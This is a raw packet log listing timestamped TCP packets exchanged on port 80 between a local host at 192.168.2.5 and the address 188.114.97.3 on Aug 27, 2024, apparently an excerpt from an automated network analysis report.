                              Aug 27, 2024 09:48:54.402786016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402795076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402820110 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.402832031 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.402859926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402873993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402915001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.402987003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403001070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403011084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403022051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403032064 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.403033018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403069973 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.403229952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403240919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403254032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403264999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403273106 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.403279066 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403290033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403300047 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.403301954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403314114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403330088 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.403340101 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.403490067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403500080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403521061 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403532028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.403532028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403549910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403559923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403563023 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.403570890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403582096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403587103 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.403593063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403610945 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.403644085 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.403945923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403956890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403970003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403981924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.403986931 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.403994083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404004097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404015064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404026031 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.404026985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404036999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404045105 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.404048920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404072046 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.404092073 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.404442072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404453039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404463053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404474974 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404500008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404504061 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.404511929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404524088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404531002 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.404535055 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404546022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404556990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404557943 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.404568911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.404587030 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.404598951 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.405098915 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.417128086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.417205095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.417223930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.417231083 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.417236090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.417262077 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.417331934 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.417342901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.417352915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.417376995 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.417438984 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.485979080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.485991955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486001968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486048937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486059904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486071110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486083031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486097097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486108065 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.486186028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.486196995 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486207008 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.486227989 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486238956 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486267090 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.486433029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486443996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486454010 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486465931 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486476898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486485004 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.486490965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486501932 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486501932 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.486520052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486531973 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.486531973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486545086 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.486618042 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.486669064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486701965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486713886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486747026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.486833096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486845016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486855030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486867905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486877918 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.486896038 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.486933947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.486974955 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.487633944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.487670898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.487680912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.487723112 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.487802029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.487813950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.487823009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.487835884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.487848043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.487848043 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.487863064 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.487936974 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.487956047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.487966061 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.488012075 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.488094091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.488106012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.488116026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.488127947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.488142014 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.488207102 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.490633965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.490652084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.490660906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.490741968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.490752935 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.490756035 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.490762949 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.490775108 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.490786076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.490791082 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.490812063 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.490828037 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.490843058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.490853071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.490888119 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.490900993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.490921021 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.490931034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.490942955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.490953922 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.490978956 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.491064072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491074085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491121054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491131067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491153002 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.491164923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491170883 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.491221905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491236925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491267920 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.491295099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491306067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491314888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491327047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491338015 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.491357088 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.491475105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491487026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491496086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491501093 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491513014 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491524935 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491568089 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.491586924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491588116 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.491601944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491612911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491622925 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.491650105 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.491687059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491698027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491708994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491730928 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.491827011 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491837025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491847038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491857052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491862059 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.491869926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491880894 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491882086 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.491893053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491909027 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.491923094 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.491954088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.491966009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492000103 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.492074013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492093086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492104053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492130041 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.492158890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492168903 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492180109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492202997 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.492223024 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.492304087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492315054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492325068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492336988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492343903 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.492347956 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492367983 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.492388010 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492429018 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.492508888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492518902 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492528915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492539883 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492551088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492558956 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.492562056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492572069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492584944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492615938 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.492634058 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.492641926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492651939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.492692947 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.510130882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.510143042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.510154009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.510215998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.510229111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.510238886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.510241985 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.510251999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.510274887 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.510340929 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.574599981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.574635029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.574645996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.574656963 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.574668884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.574677944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.574691057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.574816942 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.574848890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.574861050 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.574870110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.574899912 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.574906111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.574913979 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.574915886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.574925900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.574940920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.574950933 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.574951887 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.574979067 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.575095892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.575109005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.575118065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.575150967 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.575217962 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.575244904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.575254917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.575272083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.575283051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.575289965 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.575293064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.575335979 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.575454950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.575464964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.575474024 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.575484991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.575496912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.575500965 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.575505972 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.575526953 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.575536966 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.575556993 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.575587034 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.576174974 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.576224089 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.576257944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.576267958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.576277971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.576288939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.576348066 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.576355934 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.576365948 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.576368093 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.576380014 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.576397896 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.576514959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.576524973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.576534986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.576545954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.576556921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.576567888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.576570988 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.576596975 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.576647997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.576730013 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.579253912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579265118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579273939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579309940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579313040 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.579323053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579333067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579344034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579404116 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.579410076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579448938 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.579478025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579488993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579499006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579524040 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.579554081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579564095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579601049 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.579626083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579638004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579646111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579664946 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.579695940 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.579826117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579835892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579845905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.579875946 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.579921961 CEST8061383188.114.97.3192.168.2.5
